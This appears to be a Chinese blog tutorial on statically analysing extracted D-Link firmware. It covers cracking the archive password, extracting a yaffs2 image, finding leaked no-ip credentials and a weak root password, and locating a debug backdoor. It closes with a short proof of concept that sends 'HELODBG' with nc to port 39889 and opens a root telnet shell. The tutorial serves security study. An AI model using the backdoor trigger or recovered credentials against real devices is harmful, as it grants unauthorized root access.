静态分析IOT固件(二)

最新推荐文章于 2024-04-10 09:37:42 发布
最新推荐文章于 2024-04-10 09:37:42 发布
阅读量694 收藏 5
点赞数
分类专栏: IOT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/119648155
版权

给了个从Dlink固件里提取的样本,打开发现被加密了,得爆破。

在这里插入图片描述

kali自带了一些关于压缩文件的工具,比如生成字典用的crunch、rsmangler,爆破用的frackzip等,这些工具用法都不难。

直接用frackzip破解,(根据教程的提示)得到密码beUT9Z

输入密码解压后得到一下文件

在这里插入图片描述

其中发现有多个.yaffs2后缀的文件,这些都是固件的文件。

注:

.mbn:高通的一套用于加载网络环境的文件(modem software configuration)
.yaffs2:针对NAND芯片设计的嵌入式文件系统,可用unyaffs提取

yaffs2里有几个看上去是recovery的镜像,核心的应该是2K-mdm-image-mdm9625.yaffs2 ,我们下面就来提取该文件,我首先用binwalk来提取它,但提取出来的文件乱七八糟,不知道什么原因,后来看网上推荐直接用yaffs的原生工具unyaffs提取,就可以了,文件系统清晰明了。

unyaffs 2K-mdm-image-mdm9625.yaffs2 yaffs2-root/

在这里插入图片描述

接下来我们查找该路径下的所有.conf文件,.conf文件多是配置文件,有可能从中可以发现敏感的信息。

find . -name '*.conf'

在这里插入图片描述

其中的inadyn-mt.conf文件引起了我们注意,这是no-ip应用的配置文件,no-ip就是一个相当于花生壳的东西,可以申请动态域名。我们从中可以发现泄露的no-ip的登陆账号及密码。

cat etc/inadyn-mt.conf

在这里插入图片描述

除了上述泄露的no-ip账号密码,我们还从shadow文件中找到了root账号的密码,通过爆破可以得到root的密码为1234。

cat ~/yaffs2-root/etc/shadow

在这里插入图片描述
其实并不止有.conf文件会泄露信息,还有很多其他后缀的敏感文件会泄露信息,我们接下来使用firmwalker工具来自动化遍历该固件系统中的所有可疑文件。

在这里插入图片描述
命令如下,firmwalker会将结果保存到firmwalker.txt。

./firmwalker.sh ~/yaffs2-root/

在这里插入图片描述
firmwalker工具主要功能就是遍历各种后缀的文件,后缀数据都存在data文件夹中的各个配置文件中。

分析完敏感的配置文件后,我们接下来分析存在风险的二进制程序。查看自启动的程序,一个start_appmgr脚本引起了我们注意,mgr一般就是主控程序的意思。

在这里插入图片描述
该脚本会在开机的时候以服务的形式运行/bin.appmgr程序。

在这里插入图片描述
通过IDA进行反编译,在main函数中发现了一个管理员当时为了方便调试留下的后门,只要连接该固件的39889端口并发送HELODBG的字符串,就可以进行远程执行命令。

在这里插入图片描述
POC如下:

user@kali:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889 
Hello 
^C 
user@kali:~$ telnet 192.168.1.1 
Trying 192.168.1.1... 
Connected to 192.168.1.1. Escape character is '^]'.   
OpenEmbedded Linux homerouter.cpe     
msm 20141210 homerouter.cpe   
/ # 
id uid=0(root) gid=0(root) 
/ # 
exit 
Connection closed by foreign host. 
user@kali:~$
她总是阴雨天
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
物联网IoT安全教程()-- 静态分析IoT固件
安全杂货铺
01-08 2246
得到固件后,若直接打开,会发现该固件被加了密,无法直接解压缩,这是厂商对该固件做了保护,防止大家逆向分析他的固件。 通过frackzip工具可以破解该zip的密码,时间要挺久的,我直接告诉你吧,密码是beUT9Z。 解压后发现文件夹中有多个.yaffs2后缀的文件,这些都是固件的文件。 yaffs2里有几个看上去是recovery的镜像,核心的应该是2K-mdm-image-mdm9625....
firmwalker:用于在提取的固件文件系统中搜索好东西的脚本!
04-22
坚定的行者 一个简单的bash脚本,用于搜索已提取或已安装的固件文件系统。 它将在提取的或安装的固件文件系统中搜索感兴趣的内容,例如: etc / shadow和etc / passwd 列出etc / ssl目录 搜索与SSL相关的文件,例如.pem,.crt等。 搜索配置文件 寻找脚本文件 搜索其他.bin文件 查找诸如admin,password,remote等的关键字。 搜索物联网设备上使用的通用Web服务器 搜索常见的进制文件,例如ssh,tftp,dropbear等。 搜索URL,电子邮件地址和IP地址 实验性支持,可使用Shodan CLI调用Shodan API 用法 如果您希望使用脚本的静态代码分析部分,请安装eslint: npm i -g eslint ./firmwalker {path to root file system} {path for
Firmwalker:一款强大的固件安全分析工具
最新发布
gitblog_00062的博客
04-10 422
Firmwalker:一款强大的固件安全分析工具 项目地址:https://gitcode.com/craigz28/firmwalker Firmwalker 是一个开源的固件分析框架,由 Craig Zacker 创建并维护。它专为研究人员、安全专家和开发者设计,用于探索、分析和理解各种设备固件中的隐藏信息,帮助揭示潜在的安全隐患。 技术分析 Firmwalker 构建在 Python 和 ...
【工具篇】Firmwalker车联网安全实用小工具介绍
hollk’s blog
02-15 2583
Firmwalker是一个纯shell语言编写的脚本工具项目,主要适用于物联网中固件文件系统检索扫描工作。可以在在实际物联网、车联网渗透测试过程中,firmwalker主要在前期信息搜集阶段进行使用。根据在文件系统中进行关键字检索,获取可能具有价值的敏感数据或文件。
解密固件实践及firmwalker脚本利用
Yale的博客
05-27 1768
1.固件 固件:Firmware. 就是写入EROM(可擦写只读存储器)或者EEPROM(电可擦写可编程只读存储器)中的程序。 固件是只设备内部保存的设备“驱动程序”,通过固件,操作系统才能按照标准的设备驱动实现特定机器的运行运作,比如光驱,刻录机等都有内部固件固件是担任着一个系统最基础最底层工作的软件。而在硬件设备中,固件就是硬件设备的灵魂,因为一些硬件设备除了固件以外没有其他软件组成,因此固件也就决定这硬件设备的功能以及性能。 2.固件升级的一种方案 随着物联网安全安全越来越重视,作为万物互联的核心
yaffs2img浏览器2.0破解版
06-20
yaffs2img浏览器2.0破解版真真的破解版无需注册解压即用
IoT Hunter使用文档1
08-08
用户可以调试静态分析插件,以确保插件的正确性和可靠性。 (三) 添加动态 plugin 用户可以添加新的动态分析插件,以满足不同的分析需求。 六、 数据可视化 IoT Hunter提供了多种数据可视化方式,包括ES数据...
Python库 | mypy-boto3-iot-jobs-data-1.17.15.0.tar.gz
03-08
`boto3`是Amazon Web Services (AWS)的官方Python SDK,它允许开发者轻松地与各种AWS服务进行交互,包括计算、存储、数据库、分析、机器学习等。`boto3`库设计简洁,易于使用,为开发者提供了丰富的功能和灵活性。 ...
开源项目-vaelen-iot.zip
10-24
在实际应用中,应遵循最佳实践,如使用证书管理安全连接,定期更新设备固件以保持安全,以及合理设计数据模型以便于数据分析和存储。 总结,vaelen-iot项目为Golang开发者提供了一个与Google IoT Core交互的便捷...
IOT-secured-源码.rar
10-10
10. **安全测试**:源码可能包含自动化安全测试脚本或工具,用于静态代码分析、动态应用安全测试(DAST)和渗透测试,以发现潜在的安全问题。 由于没有具体的标签信息,以上分析基于物联网安全的一般性考虑。实际的...
firmwalker, 用于搜索goodies的固件文件系统的脚本 !.zip
09-18
firmwalker, 用于搜索goodies的固件文件系统的脚本 ! firmwalker用于搜索提取或者安装的固件文件系统的简单bash脚本。它将搜索解压缩或者装入的固件文件系统,以获取感兴趣的东西,如:etc/阴影 and etc/passwd列出 etc/ssl目录搜索相关的文件,
inadyn-mt - dynamic DNS client-开源
04-18
原始多平台inadyn和inadyn高级项目的多服务分支。 支持许多更新服务,可以轻松扩展为其他服务,包括其他服务器配置文件,自定义响应代码,自定义参数名称和自定义更新服务器类型。 高度灵活,具有许多每个别名选项参数。 支持IPv4和IPv6。 控制台,或作为服务安装。 Unicode。 等功能。 dyndns.org(动态,静态和自定义)freedns.afraid.org zoneedit.com no-ip.com easydns.com sitelutions.com dnsomatic.com ipv6tb.he.net tzo.com dhis.org 2-dns.de www .dnsdynamic.org dnspark.com regfish.de www.ovh.com joker.com system-ns.com changeip.com dnsexit.com nsupdate.com loopia.com domains.google.com(需要SSL桥,例如隧道)Duckdns。 org di.fi ddnss.de dynv6.com selfhost.de
inadyn-advanced-开源
05-17
inadyn-advanced基于inadyn(http://inadyn.ina-tech.net)。 这是一个多操作系统(** NIX和Win32)控制台动态DNS更新程序。 支持:DynDNS.org,freedns.afraid.org,ZoneEdit.com,no-ip.com,3322.org(中文),EasyDNS.com或自定义HTTP查询。
inadyn:具有SSLTLS支持的动态DNS客户端
01-30
Internet自动动态DNS客户端 始终可以从GitHub获得最新版本: 目录 介绍 Inadyn或In-a-Dyn是具有HTTPS支持的小型且简单的动态DNS 客户端。 在许多GNU / Linux发行版中普遍可用,用于现成的路由器和Internet网关,以自动执行使您的Internet名称与公用¹IP地址保持同步的任务。 它也可以用于具有冗余(备份)Internet连接的安装中。 大多数人不知道他们与同一Internet服务提供商(ISP)的其他用户共享Internet地址池。 诸如DHCP,PPPoE或PPPoA之类的协议用于为您提供地址和连接到Internet的方法,但通常不是其他人连接到您的方法。 如果要在这样的连接上运行Internet服务器,则每次重新连接时都有IP地址丢失的风险,即使重新协商了租约,DHCP也有丢失IP地址的风险。 通过使用诸如inadyn类的DDNS客户端,您可以向DDNS提供者(如注册一个Internet名称。 当您的IP地址更改时,DDNS客户端会定期和/或按需更新您的DNS记录。 Inadyn可以使用相同的IP地址维护多个主机记录,可以使
物联网固件安全缺陷检测研究进展.zip
10-16
静态分析是在不执行代码的情况下,通过解析进制文件或源代码来发现潜在的安全问题。这种技术可以快速扫描大量固件,但可能会因缺乏上下文信息而产生误报。动态分析则是在程序运行时收集信息,如内存访问模式、网络...
介绍一款Linux上的DDNS客户端工具
maizaozao的专栏
04-06 2076
[分享]介绍一款Linux上的DDNS客户端工具 引用 #1 帖子由qdzheng»2008-02-09 inadyn是一款动态DNS客户端工具,可以按照设定的时间间隔,检查当前的实际IP与域名解析出的IP是否一致,如果发现不一致则更新DNS记录。inadyn-mt则是在inadyn基础上开发的。 支持以下DDNS服务商: dyndns.org freedns.afraid.org zoneedit.com no-ip.com 3322.org easydns.com 下载地址:inady...
yaffs文件打包解包工具
eagle0728的专栏
03-03 715
Yaffs(Yet Another Flash File System)文件系统是专门针对NAND闪存设计的嵌入式文件系统,目前有YAFFS和YAFFS2两个版本,两个版本的主要区别之一在于YAFFS2能够更好的支持大容量的NAND FLASH芯片。 下载unyaffs源码,http://code.google.com/p/unyaffs/downloads/list 执行编译命令 gc...
嵌入式设备和固件中的自动漏洞检测(三):静态分析技术
qq_40229814的博客
09-01 2018
嵌入式系统与固件漏洞检测技术,静态分析视角
esp8266的IOT固件
09-15
对于ESP8266的IoT固件,有几种常见的选择可供使用。以下是其中一些流行的固件: 1. Arduino:ESP8266可以使用Arduino开发环境进行编程。你可以使用Arduino IDE来编写代码,并通过Arduino核心库和ESP8266核心库来控制硬件。 2. NodeMCU:NodeMCU是一个基于Lua脚本语言的开发平台,它使得编写和执行代码变得非常简单。你可以使用NodeMCU开发固件来控制ESP8266。 3. MicroPython:MicroPython是一种基于Python的微型解释器,可用于在嵌入式设备上运行。ESP8266支持MicroPython,你可以使用它来编写高级的Python代码控制ESP8266。 4. Espressif固件:Espressif公司为ESP8266提供了自己的固件,称为Espressif固件。它提供了丰富的功能和API,可以支持各种IoT应用。 这些只是一些流行的选择,实际上还有其他许多固件可供选择,根据你的需求和技术偏好选择合适的固件

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值